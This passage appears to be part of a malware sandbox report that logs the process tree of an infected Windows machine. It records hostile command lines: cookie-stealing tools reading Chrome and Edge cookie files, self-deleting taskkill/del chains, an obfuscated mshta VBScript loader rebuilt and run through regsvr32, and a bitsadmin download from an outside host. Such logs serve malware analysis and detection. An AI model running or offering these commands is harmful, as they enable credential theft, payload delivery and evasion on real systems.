                                                                                              "cmd.exe" /C taskkill /F /PID 4772 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\7J1dqXP5K4l7peOE5al4p_Fk.exe"
                                                                                              4⤵
                                                                                                PID:3328
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /F /PID 4772
                                                                                                  5⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:6236
                                                                                          • C:\Users\Admin\Documents\H1XAO5QnFltpYeGP4SW0rIU3.exe
                                                                                            "C:\Users\Admin\Documents\H1XAO5QnFltpYeGP4SW0rIU3.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5072
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5968
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6004
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5408
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:508
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4028
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4612
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3332
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1772
                                                                                          • C:\Users\Admin\Documents\N7r6B1nu8I75oiXSdHNFK2g4.exe
                                                                                            "C:\Users\Admin\Documents\N7r6B1nu8I75oiXSdHNFK2g4.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:5104
                                                                                            • C:\Users\Admin\Documents\N7r6B1nu8I75oiXSdHNFK2g4.exe
                                                                                              C:\Users\Admin\Documents\N7r6B1nu8I75oiXSdHNFK2g4.exe
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4956
                                                                                          • C:\Users\Admin\Documents\qL0SVtrwkIWR31EPF0OXkLsw.exe
                                                                                            "C:\Users\Admin\Documents\qL0SVtrwkIWR31EPF0OXkLsw.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:5024
                                                                                          • C:\Users\Admin\Documents\chFap_U6mQTDFJeAf_uyCICs.exe
                                                                                            "C:\Users\Admin\Documents\chFap_U6mQTDFJeAf_uyCICs.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3492
                                                                                            • C:\Users\Admin\Documents\chFap_U6mQTDFJeAf_uyCICs.exe
                                                                                              C:\Users\Admin\Documents\chFap_U6mQTDFJeAf_uyCICs.exe
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5208
                                                                                          • C:\Users\Admin\Documents\JbaVxXD8y76w_Cl9wNz5VJxO.exe
                                                                                            "C:\Users\Admin\Documents\JbaVxXD8y76w_Cl9wNz5VJxO.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4556
                                                                                            • C:\Users\Admin\Documents\JbaVxXD8y76w_Cl9wNz5VJxO.exe
                                                                                              "C:\Users\Admin\Documents\JbaVxXD8y76w_Cl9wNz5VJxO.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5980
                                                                                            • C:\Users\Admin\Documents\JbaVxXD8y76w_Cl9wNz5VJxO.exe
                                                                                              "C:\Users\Admin\Documents\JbaVxXD8y76w_Cl9wNz5VJxO.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5864
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                4⤵
                                                                                                  PID:5032
                                                                                            • C:\Users\Admin\Documents\029MALFv95zMGrVyhpJX2wst.exe
                                                                                              "C:\Users\Admin\Documents\029MALFv95zMGrVyhpJX2wst.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4532
                                                                                              • C:\Users\Admin\Documents\029MALFv95zMGrVyhpJX2wst.exe
                                                                                                "C:\Users\Admin\Documents\029MALFv95zMGrVyhpJX2wst.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:500
                                                                                            • C:\Users\Admin\Documents\rQwPynD9A08VaLNi3HZBIAi1.exe
                                                                                              "C:\Users\Admin\Documents\rQwPynD9A08VaLNi3HZBIAi1.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:4468
                                                                                              • C:\Users\Admin\Documents\rQwPynD9A08VaLNi3HZBIAi1.exe
                                                                                                C:\Users\Admin\Documents\rQwPynD9A08VaLNi3HZBIAi1.exe
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:5224
                                                                                            • C:\Users\Admin\Documents\vc9AoAtsi6D2Hl7E5aEsN3GR.exe
                                                                                              "C:\Users\Admin\Documents\vc9AoAtsi6D2Hl7E5aEsN3GR.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4828
                                                                                              • C:\Users\Admin\Documents\vc9AoAtsi6D2Hl7E5aEsN3GR.exe
                                                                                                "C:\Users\Admin\Documents\vc9AoAtsi6D2Hl7E5aEsN3GR.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4844
                                                                                            • C:\Users\Admin\Documents\M85wqa5ONglK7gGvDEMlMmxj.exe
                                                                                              "C:\Users\Admin\Documents\M85wqa5ONglK7gGvDEMlMmxj.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:3976
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                3⤵
                                                                                                  PID:5256
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 248
                                                                                                  3⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Program crash
                                                                                                  PID:628
                                                                                              • C:\Users\Admin\Documents\pQwp8bo40mfb2BvHWfHZgI6l.exe
                                                                                                "C:\Users\Admin\Documents\pQwp8bo40mfb2BvHWfHZgI6l.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4844
                                                                                                • C:\Users\Admin\Documents\pQwp8bo40mfb2BvHWfHZgI6l.exe
                                                                                                  "C:\Users\Admin\Documents\pQwp8bo40mfb2BvHWfHZgI6l.exe" -a
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5512
                                                                                              • C:\Users\Admin\Documents\Mkm2opv9ITl1IzQOykUGUbsj.exe
                                                                                                "C:\Users\Admin\Documents\Mkm2opv9ITl1IzQOykUGUbsj.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:4304
                                                                                                • C:\Users\Admin\Documents\Mkm2opv9ITl1IzQOykUGUbsj.exe
                                                                                                  C:\Users\Admin\Documents\Mkm2opv9ITl1IzQOykUGUbsj.exe
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3004
                                                                                              • C:\Users\Admin\Documents\owONv8PRAKu_2CHbWm8VK6z7.exe
                                                                                                "C:\Users\Admin\Documents\owONv8PRAKu_2CHbWm8VK6z7.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Checks processor information in registry
                                                                                                PID:4748
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im owONv8PRAKu_2CHbWm8VK6z7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\owONv8PRAKu_2CHbWm8VK6z7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                  3⤵
                                                                                                    PID:5848
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /im owONv8PRAKu_2CHbWm8VK6z7.exe /f
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:5992
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout /t 6
                                                                                                      4⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:5708
                                                                                                • C:\Users\Admin\Documents\M8oIChHmsjnMw4fC_mwu5OLz.exe
                                                                                                  "C:\Users\Admin\Documents\M8oIChHmsjnMw4fC_mwu5OLz.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:3480
                                                                                                • C:\Users\Admin\Documents\OGTiTUuAURqavFkeff9PM69H.exe
                                                                                                  "C:\Users\Admin\Documents\OGTiTUuAURqavFkeff9PM69H.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4252
                                                                                                  • C:\Users\Admin\Documents\OGTiTUuAURqavFkeff9PM69H.exe
                                                                                                    "C:\Users\Admin\Documents\OGTiTUuAURqavFkeff9PM69H.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:5768
                                                                                                • C:\Users\Admin\Documents\bDnuYorpQ7IWwdt_fwS032_4.exe
                                                                                                  "C:\Users\Admin\Documents\bDnuYorpQ7IWwdt_fwS032_4.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3784
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 656
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4544
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 668
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:5196
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 672
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:5392
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 684
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:5452
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 1120
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:5932
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 1152
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4424
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 1216
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4544
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "bDnuYorpQ7IWwdt_fwS032_4.exe" /f & erase "C:\Users\Admin\Documents\bDnuYorpQ7IWwdt_fwS032_4.exe" & exit
                                                                                                    3⤵
                                                                                                      PID:5420
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im "bDnuYorpQ7IWwdt_fwS032_4.exe" /f
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5552
                                                                                                  • C:\Users\Admin\Documents\ziJTeb5LMgjzXF0oEvBl0kBH.exe
                                                                                                    "C:\Users\Admin\Documents\ziJTeb5LMgjzXF0oEvBl0kBH.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:4284
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx983B.tmp\tempfile.ps1"
                                                                                                      3⤵
                                                                                                        PID:5032
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx983B.tmp\tempfile.ps1"
                                                                                                        3⤵
                                                                                                          PID:2104
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx983B.tmp\tempfile.ps1"
                                                                                                          3⤵
                                                                                                            PID:3408
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx983B.tmp\tempfile.ps1"
                                                                                                            3⤵
                                                                                                              PID:4804
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx983B.tmp\tempfile.ps1"
                                                                                                              3⤵
                                                                                                                PID:4464
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx983B.tmp\tempfile.ps1"
                                                                                                                3⤵
                                                                                                                  PID:2860
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx983B.tmp\tempfile.ps1"
                                                                                                                  3⤵
                                                                                                                  • Checks for any installed AV software in registry
                                                                                                                  PID:5952
                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                  "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                  3⤵
                                                                                                                  • Download via BitsAdmin
                                                                                                                  PID:4680
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0571D264\sonia_1.exe
                                                                                                              sonia_1.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3472
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0571D264\sonia_1.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS0571D264\sonia_1.exe" -a
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3356
                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:3472
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2624
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C053.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\C053.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:576
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C053.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\C053.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:6056
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              PID:5944
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                PID:6028
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                              1⤵
                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                              PID:4920
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\CFFF.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\CFFF.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:2108
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D85D.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\D85D.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5996
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                2⤵
                                                                                                                  PID:4252
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D85D.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D85D.exe
                                                                                                                  2⤵
                                                                                                                    PID:408
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DB7A.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DB7A.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:4912
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DB7A.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\DB7A.exe
                                                                                                                    2⤵
                                                                                                                      PID:1672
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EFAF.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\EFAF.exe
                                                                                                                    1⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:2388
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F1B4.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F1B4.exe
                                                                                                                    1⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:5592
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F474.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F474.exe
                                                                                                                    1⤵
                                                                                                                      PID:4828
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FC07.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\FC07.exe
                                                                                                                      1⤵
                                                                                                                        PID:5008
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2BE.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\2BE.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:6084
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2BE.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2BE.exe
                                                                                                                          2⤵
                                                                                                                            PID:2772
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:4616
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:2096
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:5944
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:4812
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4708
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:5652
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:4936
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:2148
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:1636
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E4BE.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E4BE.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:6952
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im E4BE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E4BE.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                          2⤵
                                                                                                                                            PID:6724
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /im E4BE.exe /f
                                                                                                                                              3⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:6872
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 6
                                                                                                                                              3⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:5124
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F3B3.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F3B3.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:2100
                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              "C:\Windows\System32\mshta.exe" vBSCriPt: cLOSe (cReateobjEct ( "wsCRIpt.sHeLl" ). RUn ( "CMd.exe /q /C TYPE ""C:\Users\Admin\AppData\Local\Temp\F3B3.exe"" > RZKZUBuDNKOQ.eXe&&STaRt RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho & if """" == """" for %w IN ( ""C:\Users\Admin\AppData\Local\Temp\F3B3.exe"") do taskkill /IM ""%~NXw"" -F " ,0, TRue ) )
                                                                                                                                              2⤵
                                                                                                                                                PID:4648
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\F3B3.exe" > RZKZUBuDNKOQ.eXe&&STaRt RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho & if "" == "" for %w IN ( "C:\Users\Admin\AppData\Local\Temp\F3B3.exe") do taskkill /IM "%~NXw" -F
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5236
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe
                                                                                                                                                      RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5608
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBSCriPt: cLOSe (cReateobjEct ( "wsCRIpt.sHeLl" ). RUn ( "CMd.exe /q /C TYPE ""C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe"" > RZKZUBuDNKOQ.eXe&&STaRt RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho & if ""/PBxNLCk3z93w2BqdEhU0B3H2ho "" == """" for %w IN ( ""C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe"") do taskkill /IM ""%~NXw"" -F " ,0, TRue ) )
                                                                                                                                                          5⤵
                                                                                                                                                            PID:4800
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe" > RZKZUBuDNKOQ.eXe&&STaRt RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho & if "/PBxNLCk3z93w2BqdEhU0B3H2ho " == "" for %w IN ( "C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe") do taskkill /IM "%~NXw" -F
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6880
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbsCRiPt: CloSe ( cReateoBJEct ( "wScripT.shell"). RuN ( "cMD /Q/c eCHo C:\Users\Admin\AppData\Local\TempFG> hSLc.6Y& eCHO | Set /p = ""MZ"" > 0BbRee.K & COPy /B /Y 0BBRee.K +8nFYNjX6.9+ 33FD.x5 + VxcQXO.XO+Da1D3UK3.B + 7l6cpBxI.Go + hSLC.6Y Z1XU1YiD.Ay & staRt regsvr32 /S .\Z1Xu1yID.aY " , 0 , TRUe ) )
                                                                                                                                                              5⤵
                                                                                                                                                                PID:5232
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q/c eCHo C:\Users\Admin\AppData\Local\TempFG> hSLc.6Y& eCHO | Set /p = "MZ" >0BbRee.K & COPy /B /Y 0BBRee.K +8nFYNjX6.9+ 33FD.x5 + VxcQXO.XO+Da1D3UK3.B + 7l6cpBxI.Go + hSLC.6Y Z1XU1YiD.Ay & staRt regsvr32 /S .\Z1Xu1yID.aY
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:1336
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:2040
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>0BbRee.K"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:1972
                                                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                          regsvr32 /S .\Z1Xu1yID.aY
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:1008
